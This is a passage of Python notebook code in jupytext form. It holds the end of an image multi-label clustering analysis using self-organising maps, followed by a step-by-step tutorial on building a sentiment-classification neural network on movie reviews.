tags = multilabel_df[filtered_idx].drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values[0]
citf_vector.append(np.concatenate((flattened_postprediction_feature, tags)))
citf_vector_train_test.append(np.concatenate((flattened_postprediction_feature, np.zeros_like(tags))))
citf_vector = np.array(citf_vector)
citf_vector_train_test = np.array(citf_vector_train_test)
# -
flattened_postprediction_features.shape
citf_vector.shape
# # Clustering
# ## Clustering With Word Embedding
som_embed = MiniSom(20, 20, ecitf_vector.shape[1],
sigma=5.0,
learning_rate=0.7,
topology="hexagonal",
activation_distance="cosine")
som_embed.random_weights_init(ecitf_vector)
som_embed.train_random(ecitf_vector, 1500, verbose=True)
# ## Clustering Without Word Embedding
som = MiniSom(16, 16, citf_vector.shape[1],
sigma=3.0,
learning_rate=0.7,
topology="hexagonal",
activation_distance="cosine")
som.random_weights_init(citf_vector)
som.train_random(citf_vector, 1000, verbose=True)
# # Scoring
#
# ## With Train Set
# **Threshold = 0.5**
y_pred = list()
for x in citf_vector_train_test:
winner_coords = som.winner(x)
y_pred.append(som.get_weights()[winner_coords][-8:])
y_pred = np.array(y_pred)
y_pred.shape
y_test = citf_vector[:, -8:]
y_test.shape
y_pred_tresholded = (y_pred >= 0.5).astype(int)
labels = multilabel_df.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).columns
print(classification_report(y_test, y_pred_tresholded, target_names=labels))
# +
fig, ax = plt.subplots(figsize=(15, 8))
for i in range(len(labels)):
fpr, tpr, thresholds = roc_curve(y_test[:, i], y_pred[:, i])
auc = roc_auc_score(y_test[:, i], y_pred[:, i])
ax.plot(fpr, tpr, label=labels[i] + f" (AUC: {auc:.2f})")
plt.xlabel("FPR")
plt.ylabel("TPR")
plt.title("ROC Curve")
plt.legend()
plt.show()
# -
# ## With Test Set
#
# **Threshold = 0.5**
# +
resized_raw_test_images = list()
resized_raw_test_labels = list()
for raw_image_file in glob.glob(os.path.join(TEST_IMAGES_PATH, "*.png")):
raw_img = cv2.imread(raw_image_file)
raw_img = cv2.cvtColor(raw_img, cv2.COLOR_BGR2RGB)
resized_raw_img = cv2.resize(raw_img, (224, 224))
resized_raw_test_images.append(resized_raw_img)
resized_raw_test_labels.append(os.path.basename(raw_image_file).split(".")[0])
# -
preprediction_images_test = np.array(resized_raw_test_images)
preprediction_images_test.shape
# ### With Word Embedding
filtered_idx = multilabel_df["in_train"] == 0
tags = multilabel_df[filtered_idx].drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values
prediction_tags_test = create_prediction_seqs(tags)
prediction_tags_test.shape
preprediction_images_test.shape
ecitf_vector_test = model.predict([preprediction_images_test, np.zeros_like(prediction_tags_test)])
ecitf_vector_test.shape
y_pred = list()
for x in ecitf_vector_test:
winner_coords = som_embed.winner(x)
y_pred.append(som_embed.get_weights()[winner_coords][-100:])
y_pred = np.array(y_pred)
y_true = model.predict([preprediction_images_test, prediction_tags_test])
y_true = y_true[:, -100:]
y_pred.shape
y_true.shape
r2_score(y_true, y_pred)
# ### Without Word Embedding
postprediction_features_test = vgg16_network.predict(preprediction_images_test)
postprediction_features_test.shape
flattened_postprediction_features_test = postprediction_features_test.reshape(postprediction_features_test.shape[0], -1)
# +
citf_vector_test = list()
y_test = list()
y_test_subset = list()
for flattened_postprediction_feature, image_id in zip(flattened_postprediction_features_test, resized_raw_test_labels):
filtered_idx = multilabel_df["image\\label"] == int(image_id)
tags = multilabel_df[filtered_idx].drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).values[0]
subset = multilabel_df[filtered_idx]["subset"].values[0]
y_test.append(tags)
y_test_subset.append(subset)
citf_vector_test.append(np.concatenate((flattened_postprediction_feature, np.zeros_like(tags))))
citf_vector_test = np.array(citf_vector_test)
y_test = np.array(y_test)
y_test_subset = np.array(y_test_subset)
# -
citf_vector_test[:, -8:]
y_pred = list()
for x in citf_vector_test:
winner_coords = som.winner(x)
y_pred.append(som.get_weights()[winner_coords][-8:])
y_pred = np.array(y_pred)
y_pred.shape
y_test.shape
y_test_subset.shape
y_pred_tresholded = (y_pred >= 0.5).astype(int)
# #### Subset Results
y_pred_subset = list()
for x in y_pred_tresholded:
if (x.reshape(1, -1) == total_unique_subsets).all(axis=1).any():
y_pred_subset.append((x.reshape(1, -1) == total_unique_subsets).all(axis=1).nonzero()[0][0])
else:
y_pred_subset.append(-1)
y_pred_subset = np.array(y_pred_subset)
onehot_encoder = OneHotEncoder(sparse=False, handle_unknown="ignore")
onehot_encoder.fit(y_test_subset.reshape(-1, 1))
y_pred_subset_ohencoded = onehot_encoder.transform(y_pred_subset.reshape(-1, 1))
y_test_subset_ohencoded = onehot_encoder.transform(y_test_subset.reshape(-1, 1))
#labels = multilabel_df.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).columns
print(classification_report(y_test_subset_ohencoded, y_pred_subset_ohencoded))
# #### Multi-Label Results
labels = multilabel_df.drop(["image\\label", "in_train", "total_label_count", "subset"], axis=1).columns
print(classification_report(y_test, y_pred_tresholded, target_names=labels))
# +
fig, ax = plt.subplots(figsize=(15, 8))
for i in range(len(labels)):
fpr, tpr, thresholds = roc_curve(y_test[:, i], y_pred[:, i])
auc = roc_auc_score(y_test[:, i], y_pred[:, i])
ax.plot(fpr, tpr, label=labels[i] + f" (AUC: {auc:.2f})")
plt.xlabel("FPR")
plt.ylabel("TPR")
plt.title("ROC Curve")
plt.legend()
plt.show()
|
Report.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Sentiment Classification & How To "Frame Problems" for a Neural Network
#
# by <NAME>
#
# - **Twitter**: @iamtrask
# - **Blog**: http://iamtrask.github.io
# ### What You Should Already Know
#
# - neural networks, forward and back-propagation
# - stochastic gradient descent
# - mean squared error
# - and train/test splits
#
# ### Where to Get Help if You Need it
# - Re-watch previous Udacity Lectures
# - Leverage the recommended Course Reading Material - [Grokking Deep Learning](https://www.manning.com/books/grokking-deep-learning) (40% Off: **traskud17**)
# - Shoot me a tweet @iamtrask
#
#
# ### Tutorial Outline:
#
# - Intro: The Importance of "Framing a Problem"
#
#
# - Curate a Dataset
# - Developing a "Predictive Theory"
# - **PROJECT 1**: Quick Theory Validation
#
#
# - Transforming Text to Numbers
# - **PROJECT 2**: Creating the Input/Output Data
#
#
# - Putting it all together in a Neural Network
# - **PROJECT 3**: Building our Neural Network
#
#
# - Understanding Neural Noise
# - **PROJECT 4**: Making Learning Faster by Reducing Noise
#
#
# - Analyzing Inefficiencies in our Network
# - **PROJECT 5**: Making our Network Train and Run Faster
#
#
# - Further Noise Reduction
# - **PROJECT 6**: Reducing Noise by Strategically Reducing the Vocabulary
#
#
# - Analysis: What's going on in the weights?
# + [markdown] nbpresent={"id": "56bb3cba-260c-4ebe-9ed6-b995b4c72aa3"}
# # Lesson: Curate a Dataset
# + nbpresent={"id": "eba2b193-0419-431e-8db9-60f34dd3fe83"}
def pretty_print_review_and_label(i):
print(labels[i] + "\t:\t" + reviews[i][:80] + "...")
g = open('reviews.txt','r') # What we know!
reviews = list(map(lambda x:x[:-1],g.readlines()))
g.close()
g = open('labels.txt','r') # What we WANT to know!
labels = list(map(lambda x:x[:-1].upper(),g.readlines()))
g.close()
# -
len(reviews)
# + nbpresent={"id": "bb95574b-21a0-4213-ae50-34363cf4f87f"}
reviews[0]
# + nbpresent={"id": "e0408810-c424-4ed4-afb9-1735e9ddbd0a"}
labels[0]
# -
# # Lesson: Develop a Predictive Theory
# + nbpresent={"id": "e67a709f-234f-4493-bae6-4fb192141ee0"}
print("labels.txt \t : \t reviews.txt\n")
pretty_print_review_and_label(2137)
pretty_print_review_and_label(12816)
pretty_print_review_and_label(6267)
pretty_print_review_and_label(21934)
pretty_print_review_and_label(5297)
pretty_print_review_and_label(4998)
# -
# # Project 1: Quick Theory Validation
from collections import Counter
import numpy as np
positive_counts = Counter()
negative_counts = Counter()
total_counts = Counter()
for i in range(len(reviews)):
if(labels[i] == 'POSITIVE'):
for word in reviews[i].split(" "):
positive_counts[word] += 1
total_counts[word] += 1
else:
for word in reviews[i].split(" "):
negative_counts[word] += 1
total_counts[word] += 1
positive_counts.most_common()
# +
pos_neg_ratios = Counter()
for term,cnt in list(total_counts.most_common()):
if(cnt > 100):
pos_neg_ratio = positive_counts[term] / float(negative_counts[term]+1)
pos_neg_ratios[term] = pos_neg_ratio
for word,ratio in pos_neg_ratios.most_common():
if(ratio > 1):
pos_neg_ratios[word] = np.log(ratio)
else:
pos_neg_ratios[word] = -np.log((1 / (ratio+0.01)))
# -
# words most frequently seen in a review with a "POSITIVE" label
pos_neg_ratios.most_common()
# words most frequently seen in a review with a "NEGATIVE" label
list(reversed(pos_neg_ratios.most_common()))[0:30]
# # Transforming Text into Numbers
# +
from IPython.display import Image
review = "This was a horrible, terrible movie."
Image(filename='sentiment_network.png')
# +
review = "The movie was excellent"
Image(filename='sentiment_network_pos.png')
# -
# # Project 2: Creating the Input/Output Data
vocab = set(total_counts.keys())
vocab_size = len(vocab)
print(vocab_size)
list(vocab)
# +
import numpy as np
layer_0 = np.zeros((1,vocab_size))
layer_0
# -
from IPython.display import Image
Image(filename='sentiment_network.png')
# +
word2index = {}
for i,word in enumerate(vocab):
word2index[word] = i
word2index
# +
def update_input_layer(review):
global layer_0
# clear out previous state, reset the layer to be all 0s
layer_0 *= 0
for word in review.split(" "):
layer_0[0][word2index[word]] += 1
update_input_layer(reviews[0])
# -
layer_0
def get_target_for_label(label):
if(label == 'POSITIVE'):
return 1
else:
return 0
labels[0]
get_target_for_label(labels[0])
labels[1]
get_target_for_label(labels[1])
# # Project 3: Building a Neural Network
# - Start with your neural network from the last chapter
# - 3 layer neural network
# - no non-linearity in hidden layer
# - use our functions to create the training data
# - create a "pre_process_data" function to create vocabulary for our training data generating functions
# - modify "train" to train over the entire corpus
# ### Where to Get Help if You Need it
# - Re-watch previous week's Udacity Lectures
# - Chapters 3-5 - [Grokking Deep Learning](https://www.manning.com/books/grokking-deep-learning) - (40% Off: **traskud17**)
# +
import time
import sys
import numpy as np
# Let's tweak our network from before to model these phenomena
class SentimentNetwork:
def __init__(self, reviews,labels,hidden_nodes = 10, learning_rate = 0.1):
# set our random number generator
np.random.seed(1)
self.pre_process_data(reviews, labels)
self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)
def pre_process_data(self, reviews, labels):
review_vocab = set()
for review in reviews:
for word in review.split(" "):
review_vocab.add(word)
self.review_vocab = list(review_vocab)
label_vocab = set()
for label in labels:
label_vocab.add(label)
self.label_vocab = list(label_vocab)
self.review_vocab_size = len(self.review_vocab)
self.label_vocab_size = len(self.label_vocab)
self.word2index = {}
for i, word in enumerate(self.review_vocab):
self.word2index[word] = i
self.label2index = {}
for i, label in enumerate(self.label_vocab):
self.label2index[label] = i
def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_0_1 = np.zeros((self.input_nodes,self.hidden_nodes))
self.weights_1_2 = np.random.normal(0.0, self.output_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.learning_rate = learning_rate
self.layer_0 = np.zeros((1,input_nodes))
def update_input_layer(self,review):
# clear out previous state, reset the layer to be all 0s
self.layer_0 *= 0
for word in review.split(" "):
if(word in self.word2index.keys()):
self.layer_0[0][self.word2index[word]] += 1
def get_target_for_label(self,label):
if(label == 'POSITIVE'):
return 1
else:
return 0
def sigmoid(self,x):
return 1 / (1 + np.exp(-x))
def sigmoid_output_2_derivative(self,output):
return output * (1 - output)
def train(self, training_reviews, training_labels):
assert(len(training_reviews) == len(training_labels))
correct_so_far = 0
start = time.time()
for i in range(len(training_reviews)):
review = training_reviews[i]
label = training_labels[i]
#### Implement the forward pass here ####
### Forward pass ###
# Input Layer
self.update_input_layer(review)
# Hidden layer
layer_1 = self.layer_0.dot(self.weights_0_1)
# Output layer
layer_2 = self.sigmoid(layer_1.dot(self.weights_1_2))
#### Implement the backward pass here ####
### Backward pass ###
# TODO: Output error
layer_2_error = layer_2 - self.get_target_for_label(label) # Output layer error is the difference between desired target and actual output.
layer_2_delta = layer_2_error * self.sigmoid_output_2_derivative(layer_2)
# TODO: Backpropagated error
layer_1_error = layer_2_delta.dot(self.weights_1_2.T) # errors propagated to the hidden layer
layer_1_delta = layer_1_error # hidden layer gradients - no nonlinearity so it's the same as the error
# TODO: Update the weights
self.weights_1_2 -= layer_1.T.dot(layer_2_delta) * self.learning_rate # update hidden-to-output weights with gradient descent step
self.weights_0_1 -= self.layer_0.T.dot(layer_1_delta) * self.learning_rate # update input-to-hidden weights with gradient descent step
if(np.abs(layer_2_error) < 0.5):
correct_so_far += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(training_reviews)))[:4] + "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] + " #Correct:" + str(correct_so_far) + " #Trained:" + str(i+1) + " Training Accuracy:" + str(correct_so_far * 100 / float(i+1))[:4] + "%")
if(i % 2500 == 0):
print("")
def test(self, testing_reviews, testing_labels):
correct = 0
start = time.time()
for i in range(len(testing_reviews)):
pred = self.run(testing_reviews[i])
if(pred == testing_labels[i]):
correct += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(testing_reviews)))[:4] \
+ "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] \
+ "% #Correct:" + str(correct) + " #Tested:" + str(i+1) + " Testing Accuracy:" + str(correct * 100 / float(i+1))[:4] + "%")
def run(self, review):
# Input Layer
self.update_input_layer(review.lower())
# Hidden layer
layer_1 = self.layer_0.dot(self.weights_0_1)
# Output layer
layer_2 = self.sigmoid(layer_1.dot(self.weights_1_2))
if(layer_2[0] > 0.5):
return "POSITIVE"
else:
return "NEGATIVE"
# -
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)
# evaluate our model before training (just to show how horrible it is)
mlp.test(reviews[-1000:],labels[-1000:])
# train the network
mlp.train(reviews[:-1000],labels[:-1000])
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.01)
# train the network
mlp.train(reviews[:-1000],labels[:-1000])
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.001)
# train the network
mlp.train(reviews[:-1000],labels[:-1000])
# # Understanding Neural Noise
from IPython.display import Image
Image(filename='sentiment_network.png')
# +
def update_input_layer(review):
global layer_0
# clear out previous state, reset the layer to be all 0s
layer_0 *= 0
for word in review.split(" "):
layer_0[0][word2index[word]] += 1
update_input_layer(reviews[0])
# -
layer_0
review_counter = Counter()
for word in reviews[0].split(" "):
review_counter[word] += 1
review_counter.most_common()
# # Project 4: Reducing Noise in our Input Data
# +
import time
import sys
import numpy as np
# Let's tweak our network from before to model these phenomena
class SentimentNetwork:
def __init__(self, reviews,labels,hidden_nodes = 10, learning_rate = 0.1):
# set our random number generator
np.random.seed(1)
self.pre_process_data(reviews, labels)
self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)
def pre_process_data(self, reviews, labels):
review_vocab = set()
for review in reviews:
for word in review.split(" "):
review_vocab.add(word)
self.review_vocab = list(review_vocab)
label_vocab = set()
for label in labels:
label_vocab.add(label)
self.label_vocab = list(label_vocab)
self.review_vocab_size = len(self.review_vocab)
self.label_vocab_size = len(self.label_vocab)
self.word2index = {}
for i, word in enumerate(self.review_vocab):
self.word2index[word] = i
self.label2index = {}
for i, label in enumerate(self.label_vocab):
self.label2index[label] = i
def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_0_1 = np.zeros((self.input_nodes,self.hidden_nodes))
self.weights_1_2 = np.random.normal(0.0, self.output_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.learning_rate = learning_rate
self.layer_0 = np.zeros((1,input_nodes))
def update_input_layer(self,review):
# clear out previous state, reset the layer to be all 0s
self.layer_0 *= 0
for word in review.split(" "):
if(word in self.word2index.keys()):
self.layer_0[0][self.word2index[word]] = 1
def get_target_for_label(self,label):
if(label == 'POSITIVE'):
return 1
else:
return 0
def sigmoid(self,x):
return 1 / (1 + np.exp(-x))
def sigmoid_output_2_derivative(self,output):
return output * (1 - output)
def train(self, training_reviews, training_labels):
assert(len(training_reviews) == len(training_labels))
correct_so_far = 0
start = time.time()
for i in range(len(training_reviews)):
review = training_reviews[i]
label = training_labels[i]
#### Implement the forward pass here ####
### Forward pass ###
# Input Layer
self.update_input_layer(review)
# Hidden layer
layer_1 = self.layer_0.dot(self.weights_0_1)
# Output layer
layer_2 = self.sigmoid(layer_1.dot(self.weights_1_2))
#### Implement the backward pass here ####
### Backward pass ###
# TODO: Output error
layer_2_error = layer_2 - self.get_target_for_label(label) # Output layer error is the difference between desired target and actual output.
layer_2_delta = layer_2_error * self.sigmoid_output_2_derivative(layer_2)
# TODO: Backpropagated error
layer_1_error = layer_2_delta.dot(self.weights_1_2.T) # errors propagated to the hidden layer
layer_1_delta = layer_1_error # hidden layer gradients - no nonlinearity so it's the same as the error
# TODO: Update the weights
self.weights_1_2 -= layer_1.T.dot(layer_2_delta) * self.learning_rate # update hidden-to-output weights with gradient descent step
self.weights_0_1 -= self.layer_0.T.dot(layer_1_delta) * self.learning_rate # update input-to-hidden weights with gradient descent step
if(np.abs(layer_2_error) < 0.5):
correct_so_far += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(training_reviews)))[:4] + "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] + " #Correct:" + str(correct_so_far) + " #Trained:" + str(i+1) + " Training Accuracy:" + str(correct_so_far * 100 / float(i+1))[:4] + "%")
if(i % 2500 == 0):
print("")
def test(self, testing_reviews, testing_labels):
correct = 0
start = time.time()
for i in range(len(testing_reviews)):
pred = self.run(testing_reviews[i])
if(pred == testing_labels[i]):
correct += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(testing_reviews)))[:4] \
+ "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] \
+ "% #Correct:" + str(correct) + " #Tested:" + str(i+1) + " Testing Accuracy:" + str(correct * 100 / float(i+1))[:4] + "%")
def run(self, review):
# Input Layer
self.update_input_layer(review.lower())
# Hidden layer
layer_1 = self.layer_0.dot(self.weights_0_1)
# Output layer
layer_2 = self.sigmoid(layer_1.dot(self.weights_1_2))
if(layer_2[0] > 0.5):
return "POSITIVE"
else:
return "NEGATIVE"
# -
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)
mlp.train(reviews[:-1000],labels[:-1000])
# evaluate our model before training (just to show how horrible it is)
mlp.test(reviews[-1000:],labels[-1000:])
# # Analyzing Inefficiencies in our Network
Image(filename='sentiment_network_sparse.png')
layer_0 = np.zeros(10)
layer_0
layer_0[4] = 1
layer_0[9] = 1
layer_0
weights_0_1 = np.random.randn(10,5)
layer_0.dot(weights_0_1)
indices = [4,9]
layer_1 = np.zeros(5)
for index in indices:
layer_1 += (weights_0_1[index])
layer_1
Image(filename='sentiment_network_sparse_2.png')
# # Project 5: Making our Network More Efficient
# +
import time
import sys
# Let's tweak our network from before to model these phenomena
class SentimentNetwork:
def __init__(self, reviews,labels,hidden_nodes = 10, learning_rate = 0.1):
np.random.seed(1)
self.pre_process_data(reviews)
self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)
def pre_process_data(self,reviews):
review_vocab = set()
for review in reviews:
for word in review.split(" "):
review_vocab.add(word)
self.review_vocab = list(review_vocab)
label_vocab = set()
for label in labels:
label_vocab.add(label)
self.label_vocab = list(label_vocab)
self.review_vocab_size = len(self.review_vocab)
self.label_vocab_size = len(self.label_vocab)
self.word2index = {}
for i, word in enumerate(self.review_vocab):
self.word2index[word] = i
self.label2index = {}
for i, label in enumerate(self.label_vocab):
self.label2index[label] = i
def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_0_1 = np.zeros((self.input_nodes,self.hidden_nodes))
self.weights_1_2 = np.random.normal(0.0, self.output_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.learning_rate = learning_rate
self.layer_0 = np.zeros((1,input_nodes))
self.layer_1 = np.zeros((1,hidden_nodes))
def sigmoid(self,x):
return 1 / (1 + np.exp(-x))
def sigmoid_output_2_derivative(self,output):
return output * (1 - output)
def update_input_layer(self,review):
# clear out previous state, reset the layer to be all 0s
self.layer_0 *= 0
for word in review.split(" "):
self.layer_0[0][self.word2index[word]] = 1
def get_target_for_label(self,label):
if(label == 'POSITIVE'):
return 1
else:
return 0
def train(self, training_reviews_raw, training_labels):
training_reviews = list()
for review in training_reviews_raw:
indices = set()
for word in review.split(" "):
if(word in self.word2index.keys()):
indices.add(self.word2index[word])
training_reviews.append(list(indices))
assert(len(training_reviews) == len(training_labels))
correct_so_far = 0
start = time.time()
for i in range(len(training_reviews)):
review = training_reviews[i]
label = training_labels[i]
#### Implement the forward pass here ####
### Forward pass ###
# Input Layer
# Hidden layer
# layer_1 = self.layer_0.dot(self.weights_0_1)
self.layer_1 *= 0
for index in review:
self.layer_1 += self.weights_0_1[index]
# Output layer
layer_2 = self.sigmoid(self.layer_1.dot(self.weights_1_2))
#### Implement the backward pass here ####
### Backward pass ###
# Output error
layer_2_error = layer_2 - self.get_target_for_label(label) # Output layer error is the difference between desired target and actual output.
layer_2_delta = layer_2_error * self.sigmoid_output_2_derivative(layer_2)
# Backpropagated error
layer_1_error = layer_2_delta.dot(self.weights_1_2.T) # errors propagated to the hidden layer
layer_1_delta = layer_1_error # hidden layer gradients - no nonlinearity so it's the same as the error
# Update the weights
self.weights_1_2 -= self.layer_1.T.dot(layer_2_delta) * self.learning_rate # update hidden-to-output weights with gradient descent step
for index in review:
self.weights_0_1[index] -= layer_1_delta[0] * self.learning_rate # update input-to-hidden weights with gradient descent step
if(np.abs(layer_2_error) < 0.5):
correct_so_far += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(training_reviews)))[:4] + "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] + " #Correct:" + str(correct_so_far) + " #Trained:" + str(i+1) + " Training Accuracy:" + str(correct_so_far * 100 / float(i+1))[:4] + "%")
def test(self, testing_reviews, testing_labels):
correct = 0
start = time.time()
for i in range(len(testing_reviews)):
pred = self.run(testing_reviews[i])
if(pred == testing_labels[i]):
correct += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(testing_reviews)))[:4] \
+ "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] \
+ "% #Correct:" + str(correct) + " #Tested:" + str(i+1) + " Testing Accuracy:" + str(correct * 100 / float(i+1))[:4] + "%")
def run(self, review):
# Input Layer
# Hidden layer
self.layer_1 *= 0
unique_indices = set()
for word in review.lower().split(" "):
if word in self.word2index.keys():
unique_indices.add(self.word2index[word])
for index in unique_indices:
self.layer_1 += self.weights_0_1[index]
# Output layer
layer_2 = self.sigmoid(self.layer_1.dot(self.weights_1_2))
if(layer_2[0] > 0.5):
return "POSITIVE"
else:
return "NEGATIVE"
# -
mlp = SentimentNetwork(reviews[:-1000],labels[:-1000], learning_rate=0.1)
mlp.train(reviews[:-1000],labels[:-1000])
# evaluate our model before training (just to show how horrible it is)
mlp.test(reviews[-1000:],labels[-1000:])
# # Further Noise Reduction
Image(filename='sentiment_network_sparse_2.png')
# words most frequently seen in a review with a "POSITIVE" label
pos_neg_ratios.most_common()
# words most frequently seen in a review with a "NEGATIVE" label
list(reversed(pos_neg_ratios.most_common()))[0:30]
from bokeh.models import ColumnDataSource, LabelSet
from bokeh.plotting import figure, show, output_file
from bokeh.io import output_notebook
output_notebook()
# +
hist, edges = np.histogram(list(map(lambda x:x[1],pos_neg_ratios.most_common())), density=True, bins=100, normed=True)
p = figure(tools="pan,wheel_zoom,reset,save",
toolbar_location="above",
title="Word Positive/Negative Affinity Distribution")
p.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:], line_color="#555555")
show(p)
# +
frequency_frequency = Counter()
for word, cnt in total_counts.most_common():
frequency_frequency[cnt] += 1
# +
hist, edges = np.histogram(list(map(lambda x:x[1],frequency_frequency.most_common())), density=True, bins=100, normed=True)
p = figure(tools="pan,wheel_zoom,reset,save",
toolbar_location="above",
title="The frequency distribution of the words in our corpus")
p.quad(top=hist, bottom=0, left=edges[:-1], right=edges[1:], line_color="#555555")
show(p)
# -
# # Reducing Noise by Strategically Reducing the Vocabulary
# +
import time
import sys
import numpy as np
# Let's tweak our network from before to model these phenomena
class SentimentNetwork:
def __init__(self, reviews,labels,min_count = 10,polarity_cutoff = 0.1,hidden_nodes = 10, learning_rate = 0.1):
np.random.seed(1)
self.pre_process_data(reviews, polarity_cutoff, min_count)
self.init_network(len(self.review_vocab),hidden_nodes, 1, learning_rate)
def pre_process_data(self,reviews, polarity_cutoff,min_count):
positive_counts = Counter()
negative_counts = Counter()
total_counts = Counter()
for i in range(len(reviews)):
if(labels[i] == 'POSITIVE'):
for word in reviews[i].split(" "):
positive_counts[word] += 1
total_counts[word] += 1
else:
for word in reviews[i].split(" "):
negative_counts[word] += 1
total_counts[word] += 1
pos_neg_ratios = Counter()
for term,cnt in list(total_counts.most_common()):
if(cnt >= 50):
pos_neg_ratio = positive_counts[term] / float(negative_counts[term]+1)
pos_neg_ratios[term] = pos_neg_ratio
for word,ratio in pos_neg_ratios.most_common():
if(ratio > 1):
pos_neg_ratios[word] = np.log(ratio)
else:
pos_neg_ratios[word] = -np.log((1 / (ratio + 0.01)))
review_vocab = set()
for review in reviews:
for word in review.split(" "):
if(total_counts[word] > min_count):
if(word in pos_neg_ratios.keys()):
if((pos_neg_ratios[word] >= polarity_cutoff) or (pos_neg_ratios[word] <= -polarity_cutoff)):
review_vocab.add(word)
else:
review_vocab.add(word)
self.review_vocab = list(review_vocab)
label_vocab = set()
for label in labels:
label_vocab.add(label)
self.label_vocab = list(label_vocab)
self.review_vocab_size = len(self.review_vocab)
self.label_vocab_size = len(self.label_vocab)
self.word2index = {}
for i, word in enumerate(self.review_vocab):
self.word2index[word] = i
self.label2index = {}
for i, label in enumerate(self.label_vocab):
self.label2index[label] = i
def init_network(self, input_nodes, hidden_nodes, output_nodes, learning_rate):
# Set number of nodes in input, hidden and output layers.
self.input_nodes = input_nodes
self.hidden_nodes = hidden_nodes
self.output_nodes = output_nodes
# Initialize weights
self.weights_0_1 = np.zeros((self.input_nodes,self.hidden_nodes))
self.weights_1_2 = np.random.normal(0.0, self.output_nodes**-0.5,
(self.hidden_nodes, self.output_nodes))
self.learning_rate = learning_rate
self.layer_0 = np.zeros((1,input_nodes))
self.layer_1 = np.zeros((1,hidden_nodes))
def sigmoid(self,x):
return 1 / (1 + np.exp(-x))
def sigmoid_output_2_derivative(self,output):
return output * (1 - output)
def update_input_layer(self,review):
# clear out previous state, reset the layer to be all 0s
self.layer_0 *= 0
for word in review.split(" "):
self.layer_0[0][self.word2index[word]] = 1
def get_target_for_label(self,label):
if(label == 'POSITIVE'):
return 1
else:
return 0
def train(self, training_reviews_raw, training_labels):
training_reviews = list()
for review in training_reviews_raw:
indices = set()
for word in review.split(" "):
if(word in self.word2index.keys()):
indices.add(self.word2index[word])
training_reviews.append(list(indices))
assert(len(training_reviews) == len(training_labels))
correct_so_far = 0
start = time.time()
for i in range(len(training_reviews)):
review = training_reviews[i]
label = training_labels[i]
#### Implement the forward pass here ####
### Forward pass ###
# Input Layer
# Hidden layer
# layer_1 = self.layer_0.dot(self.weights_0_1)
self.layer_1 *= 0
for index in review:
self.layer_1 += self.weights_0_1[index]
# Output layer
layer_2 = self.sigmoid(self.layer_1.dot(self.weights_1_2))
#### Implement the backward pass here ####
### Backward pass ###
# Output error
layer_2_error = layer_2 - self.get_target_for_label(label) # Output layer error is the difference between desired target and actual output.
layer_2_delta = layer_2_error * self.sigmoid_output_2_derivative(layer_2)
# Backpropagated error
layer_1_error = layer_2_delta.dot(self.weights_1_2.T) # errors propagated to the hidden layer
layer_1_delta = layer_1_error # hidden layer gradients - no nonlinearity so it's the same as the error
# Update the weights
self.weights_1_2 -= self.layer_1.T.dot(layer_2_delta) * self.learning_rate # update hidden-to-output weights with gradient descent step
for index in review:
self.weights_0_1[index] -= layer_1_delta[0] * self.learning_rate # update input-to-hidden weights with gradient descent step
if(layer_2 >= 0.5 and label == 'POSITIVE'):
correct_so_far += 1
if(layer_2 < 0.5 and label == 'NEGATIVE'):
correct_so_far += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(training_reviews)))[:4] + "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] + " #Correct:" + str(correct_so_far) + " #Trained:" + str(i+1) + " Training Accuracy:" + str(correct_so_far * 100 / float(i+1))[:4] + "%")
def test(self, testing_reviews, testing_labels):
correct = 0
start = time.time()
for i in range(len(testing_reviews)):
pred = self.run(testing_reviews[i])
if(pred == testing_labels[i]):
correct += 1
reviews_per_second = i / float(time.time() - start)
sys.stdout.write("\rProgress:" + str(100 * i/float(len(testing_reviews)))[:4] \
+ "% Speed(reviews/sec):" + str(reviews_per_second)[0:5] \
